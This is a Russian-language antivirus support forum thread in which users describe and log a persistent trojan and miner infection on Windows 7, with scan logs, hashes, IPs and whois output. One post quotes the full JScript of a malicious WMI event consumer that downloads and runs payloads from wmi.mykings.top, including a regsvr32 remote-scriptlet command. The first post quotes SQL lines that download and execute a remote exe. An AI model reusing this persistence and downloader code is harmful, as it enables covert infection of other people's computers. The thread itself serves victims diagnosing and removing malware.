25 ответов в этой теме

[Hackcraftx]

Здравствуйте. После кучи советов из гугла, я наткнулся на любопытную статью:

 

https://vms.drweb.ru/virus/?i=14934685

 

Она - причина, которая привела меня на этот форум.

 

Я - пользователь windows 7, шизофренник в плане заражения вирусами, поэтому проверялся каждую неделю, а то и несколько раз на дню утилитой Dr.Web CureIt!

 

По интернету я сёрфил мало, однако некоротым сайтам (кроме "неймов" аля гугл, вконтакте), всё же доверял, так как CureIt ничего после них не находил. Использовал режим инкогнито в google chrome, чтобы не сохранять кеш подобных сайтов. И вот однажды (2 дня назад) меня прошибло молнией. При заходе в google chrome, я увидел, что у меня заработал отключенный вручную в целях производительности год назад брандмаузер windows. После открытия диспетчера задач, я обнаружил всякие процессы rundll32. Полез в автозагрузку msconfig - и там увидел 3 программы, названием косящих под Windows, в свойствах или описании которых были прописаны строки, как в вашей статье про линукс троян, а именно что-то вроде:

 

 

SELECT downa("http://*****.com:280/mysql.exe","c:\\windows\\system32\\ser.exe"); 

SELECT cmda("C:\\windows\\system32\\ser.exe");

 

 

Точно, к сожалению, я не запомнил, так как удалил эти проги из автозагрузки программой ccleaner, которая так же обнаружила задачу, которая называлась примерно так же, как описывается в статье: "myusa". Заверяю вас, что в конце этих линков в строках наверху так же была цифра "280"

 

После этого, раз CureIt, уж извините, не справился, я нашел троян другим антивирусом. Файл трояна назывался "item.dat", после чего я успокоился и сменил все пароли на своих аккаунтах. Но днем, зайдя на ютуб посмотреть пару видео, тот антивирус прекратил загрузку этого же трояна, да ещё и другого, связанного с ним  "test[01].dat"

 

У меня есть информация, откуда он скачался: http://47.88.216.68, пометка на ещё какой-то файл scrcons.exe.

 

Во время написания этой темы я проверился DR.Web, и снова ничего не нашел. Правда, и тот антивирус пока молчит. Но ведь проблема может вернуться в любой момент. Пожалуйста, помогите. Я готов сотрудничать.

Точно, к сожалению, я не запомнил, так как удалил эти проги из автозагрузки программой ccleaner, которая так же обнаружила задачу, которая называлась примерно так же, как описывается в статье: "myusa"

 

После этого, раз CureIt, уж извините, не справился, я нашел троян другим антивирусом. Файл трояна назывался "

Прикрепленные файлы:

•  cureit.log   3,13Мб   2 Скачано раз

[Dr.Robot]

1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,

Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ - сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.

2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,

- попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
- детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
- дождаться ответа аналитика или хелпера;

3. Если у Вас зашифрованы файлы,

Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.

Что НЕ нужно делать:
- лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
- переустанавливать операционную систему;
- менять расширение у зашифрованных файлов;
- очищать папки с временными файлами, а также историю браузера;
- использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из "Аптечки сисадмина" Dr. Web;
- использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.

Что необходимо сделать:
- прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба - это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];


4. При возникновении проблем с интернетом, таких как "не открываются сайты", в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа "Содержание сайта заблокировано" и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig


Для этого проделайте следующее:

• Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить...
• В появившемся окне наберите cmd и нажмите клавишу <Enter>. Появится черное окно консоли (интерпретатора команд).
• Напишите в этом черном окне команду ipconfig /all>"%userprofile%\ipc.log" и нажмите клавишу <Enter>, затем наберите там же команду explorer.exe /select,"%userprofile%\ipc.log" и нажмите клавишу <Enter>, нужный файл будет показан в Проводнике Windows.
• Приложите этот файл к своему сообщению на форуме.

Чтобы не сделать ошибок в написании команд, можно скопировать эти команды отсюда и последовательно вставлять в черное окно консоли путем выбора пункта Вставить из меню, появляющегося при нажатии правой кнопки мыши в черном окне консоли.

[Hackcraftx]

Извините за повторение строки в первом посте и плохое оформление, просто почему-то строки становились всё меньше и меньше, и чтоб изменить их размер на обычный, я копипастнул в файл txt и обратно. Вышла ошибка, а отредактировать пост не дают.

Сообщение было изменено Hackcraftx: 01 Май 2017 - 16:09

[Dmitry_rus]

"Точно не запомнил", "называлась примерно так же", "что-то вроде"...

Печаль. Раз уж готовы сотрудничать, то просьба быть более внимательным и приводить все сообщения/строки дословно.

Пока же от вашей информации пользы недостаточно, извините...

[Hackcraftx]

Я понимаю, однако я не хочу допустить повторной их установки, поэтому держу антивирус включенным. Возможно, есть какой-то общий механизм отсечения остатков + тему создал на будущее, на случай появления дополнительной информации. 

 

Информация по удалению того, что скачалось после первого удаления:

 

Имя файла: test[1].dat

Имя угрозы: Trojan.Gen.2Полный путь: c:\windows\system32\config\systemprofile\appdata\local\microsoft\windows\temporary internet files\content.ie5\893grk6i\test[1].dat

 

____________________________

 

____________________________

 

 

На компьютерах, начиная с 

01.05.2017 в 12:48:59

 

Последнее использование 

01.05.2017 в 12:50:32

 

Элемент автозагрузки 

Нет

 

Запущен 

Нет

 

Тип угрозы: Вирус. Программы, которые заражают другие программы, файлы и различные области компьютера, добавляя или включая себя в соответствующий объект.   

 

____________________________

 

 

test[1].dat Имя угрозы: Trojan.Gen.2

Обнаружение

 

Новый

Файл был выпущен 29 дн. назад.

 

Высокий

Уровень угрозы файла: высокий.

 

 

____________________________

 

 

http://47.88.216.68:8888/test.dat

Загруженный файл: От 47.88.216.68

Источник: внешний носитель

 

scrcons.exe

 

 

Файл создан:

test[1].dat

 

____________________________

 

Действия с файлом

 

Файл: c:\windows\system32\config\systemprofile\appdata\local\microsoft\windows\temporary internet files\content.ie5\893grk6i\ test[1].dat Угроза удалена

Файл: c:\windows\debug\ item.dat Угроза удалена

Зараженный файл: c:\windows\system32\config\systemprofile\appdata\local\microsoft\windows\temporary internet files\content.ie5\893grk6i\ test[1].dat Удален

Зараженный файл: c:\windows\debug\ item.dat Удален

____________________________

 

 

Идентификационный отпечаток файла - SHA:

e6fc79a24d40aea81afdc7886a05f008385661a518422b22873d34496c3fb36b

Идентификационный отпечаток файла - MD5:

a206d9e633c7d74a735190299b125271

Сообщение было изменено Hackcraftx: 01 Май 2017 - 16:27

[The Comedian]

Здравствуйте!

Извиняюсь, что врываюсь в чужую тему, но у меня такая же точно проблема, возможно, мой пост будет полезен. Заметил вирус, когда появился процесс "Taskmgrss", который отжирал 50% ЦП. Вместе с ним были svch0st.exe и expIorer.exe (с большой i вместо l). Тогда был установлен бесплатный Malwarebytes, поэтому лог с него

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 26.04.2017
Scan Time: 23:54
Logfile: 888.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2017.04.26.06
Rootkit Database: v2017.04.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: TheComedian

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 300885
Time Elapsed: 6 min, 23 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 1
Backdoor.Agent, C:\Windows\system\svch0st.exe, 2600, Delete-on-Reboot, [a20cbd38e4c4ce680f49d79e847e42be]

Modules: 0
(No malicious items detected)

Registry Keys: 1
Backdoor.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\MpsSvcc, Quarantined, [a20cbd38e4c4ce680f49d79e847e42be],

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 2
Trojan.Agent, C:\Windows\SysWOW64\expIorer.exe, Quarantined, [edc107eecfd9b77f524c6eea08fac23e],
Backdoor.Agent, C:\Windows\system\svch0st.exe, Delete-on-Reboot, [a20cbd38e4c4ce680f49d79e847e42be],

Physical Sectors: 0
(No malicious items detected)


(end)

 

 

Потом поставил Dr. Web, он стал находить файлы, в том числе и те, про которые писал автор

 

 

Дата: 30.04.2017 19:44 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: bit6a31.tmp
Угроза: Win32.Parite.2
Действие: Вылечено
Путь: C:/windows/temp/bit6a31.tmp

 

 

Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: cc1.exe
Угроза: Trojan.DownLoader21.61944
Действие: Перемещено
Путь: C:/programdata/cc1.exe

 

Дата: 02.05.2017 2:19 Компонент: Сканер Код: 700 Событие: Обнаружена угроза Сведения: Объект: test[1].dat
Угроза: Trojan.DownLoader24.53357
Действие: Перемещено
Путь: C:/Windows/system32/config/systemprofile/AppData/Local/Microsoft/Windows/Temporary Internet Files/Content.IE5/O7470ZOB/test[1].dat

 

Дата: 01.05.2017 23:39 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: item.dat
Угроза: Trojan.DownLoader24.53357
Действие: Перемещено
Путь: /Device/HarddiskVolume3/Windows/debug/item.dat

Первое время та еще вакханалия была, рядом с notepad.exe создался notpad exe и просился в интернет, причем антивирус не распознавал его как вирус, еще в папке винды создался подозрительный экзешник GetPass. Антивирус его не распознал, я его сразу же удалил. .

 

Сейчас Spider Gate периодически перехватывает попытки зайти на левые сайты, причем в браузере я этого не замечаю, меня никто не пытается переправить. Собственно, с этого я и нашел эту тему

 

Дата: 02.05.2017 20:43 Компонент: SpIDer Gate Код: 101 Событие: URL заблокирован Сведения: URL: http://47.88.216.68:8888/test.dat
Причина: Источник распространения вирусов

И еще из недавнего:

 

Компонент: SpIDer Gate Код: 101 Событие: URL заблокирован Сведения: URL: http://loadm.exelator.com/load?_kdpid=e4942ff0-4070-4896-a7ef-e6a5a30ce9f9&buid=Jzut5xNm&p=204&g=270&j=0
Причина: Нерекомендуемый сайт

 

Компонент: SpIDer Gate Код: 101 Событие: URL заблокирован Сведения: URL: ib.adnxs.com
Причина: Нерекомендуемый сайт

Сделал полный скан на вирусы в безопасном режиме, какие-то вирусы он нашел, но вот эту проблему разрешить не удалось.

[The Comedian]

Забыл упомянуть, что rundll32.exe стал стучаться на непонятный айпи из Гонконга, что мне показалось очень подозрительным, пришлось заблочить брэндмауером.

[Василий Пупкин]

Загляните на всякий случай в реестр HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

У меня там автозагрузка какой-то левой фигни была прописана.

Было такое же сообщение, но не только оно. Второе было более неприятным, т.к. после него комп перезагружался, затрагивало процесс lsass.exe Возможно разные вирусы. Что-то удалилось антивирусом. Ещё была попытка прописать левого пользователя, тоже вручную удалял.

[Василий Пупкин]

[StanislavStryukov]

Подтверждаю наличие подобного вируса.

Утилиты dr web cure it и другого известного вендора не до конца проводили лечение.

После сканирования компьютера вирусы вновь (руткит из скриншота выше, троян-дроппер и биткоин майнер) загружались на компьютер (обычно ночью загружались в 01:00 - 04:00).

Пути реестра с автозагрузкой были пусты, в планировщике windows также ничего.

Вирус маскировался в процессы javaw, Taskmgrss и отжирал 50% процессорных ресурсов.

После чистки drweb cure it прошёлся утилитой trojan remover (тот в процессе сканирования обнаружил установленную службу с нечитаемым названием и файл  svch0st.exe). Утилита удалила все эти файлы. После этого вирусы больше не появились на ПК.

Сообщение было изменено StanislavStryukov: 05 Май 2017 - 17:22

[StanislavStryukov]

Каким образом попал на 2 ПК, понять не могу, т.к. в принципе за год ничего не ставил, использовал только для работы уже установленное ПО (лицензия), единственное, ПК напрямую смотрят в инет (брандмауэра нет, стоит антивирус DrWeb Security Space).

[santy]

@StanislavStryukov

сделайте образ автозапуска в uVS по этим компам актуальной версией uVS (4.0.1)/

 

разработчик добавил новый раздел но обработчикам событий:

 

---------------------------------------------------------
 4.00.1
---------------------------------------------------------
 o Добавлена новая категория "WMI: обработчики событий".

[chacha]

Очень похожая ситуация.

Я как и автор темы полнейший параноик, вирусов не видел уже много лет, качаю файлы редко, все проверяю на вирустотале, по сомнительным сайтам не хожу, поэтому сразу насторожился...

Бувально неделю назад rundll32 стал стучаться в интернет (ip, как потом выяснилось, гонконговский), доступ фаером естественно заблочил. Сразу сделал поиск по жесткому диску на файлы не старше 1 часа и всплыл этот самый windows\debug\item.dat, скинул на вирустотал и опасения подтвердились.

 

Сразу же начинаю проверять все места куда зараза прописаться могла.

1) В msconfig появились 3 записи с галочками:

2) В Планировщик заданий добавляется запись, к сожалению названия не помню, что-то там Myso или вроде того, проверьте у себя и скажите название. Она, насколько помню, на старте системы пингует какой-то адрес.

3) Вот с wbemtest.exe я дело имею впервые. Не знаю какими судьбами, но наткнулся на статью, в ней вроде другой вирус (у меня ярлыки не модифицированы), но вот в Тестер Инструментария Управления Windows запись добавилась. Чтобы её найти нужно запустить этот самый wbemtest.exe, нажать "Подключить", в поле "Пространство имён" ввести "root\subscription" и нажать "Подключить", нажать "Экземпляры", ввести "ActiveScriptEventConsumer" после чего можно увидеть такую картину:

Ну по "fuckyou" я сразу догадался что запись лишняя. Щелкаем на неё и жмём "Удалить"

В WMI Explorer, кстати, нашел код этого самого экземпляра, вот он:

var toff=3000;
var url1 = "http://wmi.mykings.top:8888/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) { t = arr[i].split(" ");
proc = t[0]; 
path = t[1]; 
dele = t[2]; 
wsh.Run("taskkill /f /im " + proc, 0, true);
if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };
var locator=new ActiveXObject("WbemScripting.SWbemLocator");
var service=locator.ConnectServer(".","root/cimv2");
var colItems=service.ExecQuery("select * from Win32_Process");
var e=new Enumerator(colItems);
var t1=new Date().valueOf();
for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};
var t2=0;
while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");
var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");
for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");

Собственно эти три пункта и item.dat в папке windows\debug - это все, что я нашел на компе (если что-то еще знаете то прошу поделиться). Однако вчера rundll32 снова постучался в интернет и все записи и item.dat вернулись на свои места. То ли я не вычистил заразу до конца, то ли дыра в браузере опять была пробита. На то время единственной запущенной запущенной программой был Google Chrome (portable версия) и открыта вкладка одного из стримеров на twitch.tv. Хром у меня давненько не обновляется (особенность портабл версии, видимо придется на стандартную переходить), поэтому если как-то вирус и мог попасть на компьютер, то только через уязвимость браузера.

[chacha]

Прошу прощение за отдельный пост, кнопку редактирования поста не нашел

Наткнулся на статью: http://vinc.top/2017/05/03/windows%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%EF%BC%8820170503%EF%BC%89/

К сожалению она на китайском, но кое-что еще разобрать удалось:

- Если в консоли набрать "net user" - кроме всех учетных записей, гостя и администратора можно увидеть IUSR_Servs - его как раз вирус добавляет. Как удалить пока не разобрался.

- Задание в Планировщике задач называется Mysa

Никаких других следов у себя я не нашел, возможно потому что фаерволлом доступа rundll32 не дал.

[La_piovra]

Всем привет. Такая же ситуация. Мучаюсь с этим вирусом с 1 мая. Редко где лажу по сети, но всё равно подцепил заразу. После недели мучений, вручную удалений разных вирусов, появляющихся в папке security, debug, temp, tempory internet files, установил спайдера от веба. Также всё вычистил. Этого вредоносное программное обеспечениеного нового пользователя IUSR_Servs удалил. В планировщике задач задание - mysa (хм... Муса? Муза? Миса?) также снёс. Комп относительно чистым оказался. Полез полазить по разным сайтам через хром и оперу. Минут через десять открыл статистику спайдера и увидел, что заблокировано куча адресов, а также попытка скачать Trojan.DownLoader24.53357, угроза устаранена. Но вот айпи адрес с котрого была попытка скачать качальщик вирусни оказался другой: 67.229.144.218:8888. Пробив этот адрес через поисковик выяснил следующее:

IP 67.229.144.218 Хост: 67.229.144.218.static.krypt.com Город: Orange Страна:  United States IP диапазон: 67.229.0.0 - 67.229.255.255 CIDR: 67.229.0.0/16 Название провайдера: Krypt Technologies

NetRange: 67.229.0.0 - 67.229.255.255
CIDR: 67.229.0.0/16
NetName: VPLSNET
NetHandle: NET-67-229-0-0-1
Parent: NET67 (NET-67-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS35908
Organization: Krypt Technologies (VPLSI)
RegDate: 2007-11-12
Updated: 2012-03-02
Comment: 
Comment: For legal requests/assistance please use the
Comment: following contact information:
Comment: VPLS Subpoena Phone: 213-406-9088
Comment: VPLS Abuse Fax: 213-406-9001
Comment: VPLS AUP, Terms of Service and DMCA/Copyright notices info:
Comment: http://www.vpls.net/privacy/
Ref: https://whois.arin.net/rest/net/NET-67-229-0-0-1

OrgName: Krypt Technologies
OrgId: VPLSI
Address: 1744 W. Katella Avenue.

Address: Suite 200
City: Orange
StateProv: CA
PostalCode: 92867
Country: US
RegDate: 2005-03-25
Updated: 2017-01-28
Comment: For legal requests/assistance please use the

Comment: following contact information:

Comment: VPLS Subpoena Phone: 213-406-9018

Comment: VPLS Abuse Fax: 213-406-9001

Comment: VPLS AUP, Terms of Service and DMCA/Copyright notices info: http://www.vpls.net/privacy/

Comment: descr: This space is statically assigned.
Ref: https://whois.arin.net/rest/org/VPLSI

ReferralServer: rwhois://vault.krypt.com:4321

OrgAbuseHandle: KRYPT-ARIN
OrgAbuseName: Krypt Keeper
OrgAbusePhone: +1-213-406-9018 
OrgAbuseEmail: abuse@kryptservers.com
OrgAbuseRef: https://whois.arin.net/rest/poc/KRYPT-ARIN

OrgNOCHandle: NETWO813-ARIN
OrgNOCName: Network Engineering
OrgNOCPhone: +1-866-599-9593 
OrgNOCEmail: abuse@vpls.net
OrgNOCRef: https://whois.arin.net/rest/poc/NETWO813-ARIN

OrgTechHandle: TME68-ARIN
OrgTechName: Mektrakarn, Ted 
OrgTechPhone: +1-213-406-9000 
OrgTechEmail: Ted@vpls.net
OrgTechRef: https://whois.arin.net/rest/poc/TME68-ARIN

OrgTechHandle: KRYPT-ARIN
OrgTechName: Krypt Keeper
OrgTechPhone: +1-866-599-9593 
OrgTechEmail: abuse@krypt.com
OrgTechRef: https://whois.arin.net/rest/poc/KRYPT-ARIN

RNOCHandle: NETWO813-ARIN
RNOCName: Network Engineering
RNOCPhone: +1-866-599-9593 
RNOCEmail: abuse@vpls.net
RNOCRef: https://whois.arin.net/rest/poc/NETWO813-ARIN

RAbuseHandle: KRYPT-ARIN
RAbuseName: Krypt Keeper
RAbusePhone: +1-866-599-9593 
RAbuseEmail: abuse@krypt.com
RAbuseRef: https://whois.arin.net/rest/poc/KRYPT-ARIN

RTechHandle: KRYPT-ARIN
RTechName: Krypt Keeper
RTechPhone: +1-866-599-9593 
RTechEmail: abuse@krypt.com
RTechRef: https://whois.arin.net/rest/poc/KRYPT-ARIN

 

Жду дальше новой активности вирусни. Что-то засело  в системе раз при выходе в интернет лезет скачивать эту херь.

[La_piovra]

Только заметил, что там даже телефоны указаны... ахаха, можно им звякнуть и спросить нафига они занимаются распростронением этого вируса.

[La_piovra]

Ещё нашёл кое что про этот вирус. Сайт игровой правда. http://forums.playground.ru/hardware/majner_winsec_exe_msiexev_exe-934689/

[Бут]

Тоже влип в историю с этим трояном. Отчаявшись безрезультатностью сканирования, я форматировал системный раздел диска и установил Windows 7 заново. Троян по-прежнему где-то сидит.

 

По системному журналу я замечаю попытки атаки в ночное время. Я запретил доступ к компьютеру по сети и включил аудит таких событий, поэтому появляются логи вида: "Аудит отказа":

Учетной записи не удалось выполнить вход в систему.

Субъект:
	ИД безопасности:		NULL SID
	Имя учетной записи:		-
	Домен учетной записи:		-
	Код входа:		0x0

Тип входа:			3

Учетная запись, которой не удалось выполнить вход:
	ИД безопасности:		NULL SID
	Имя учетной записи:		Administrateur
	Домен учетной записи:		FXNB

Файрвол из состава Доктора веба регулярно, раз в два-три часа, ловит исходящие подключения от процессов lsass или scrons на адрес:

tcp://23.27.127.254 8888 (wmi.mykings.top)

[Dmitry_rus]

форматировал системный раздел диска и установил Windows 7 заново. Троян по-прежнему где-то сидит.

1. Форматировнание и переустановка ОС - это не наш метод.

2. После форматирования ничего нигде сидеть не может. Просто по определению. Либо вы уже успели подхватить заново, на свежеустановленной системе.

[Бут]

 

форматировал системный раздел диска и установил Windows 7 заново. Троян по-прежнему где-то сидит.

1. Форматировнание и переустановка ОС - это не наш метод.

2. После форматирования ничего нигде сидеть не может. Просто по определению. Либо вы уже успели подхватить заново, на свежеустановленной системе.

 

 

После форматирования системного раздела что-то вполне может сидеть на не системных разделах.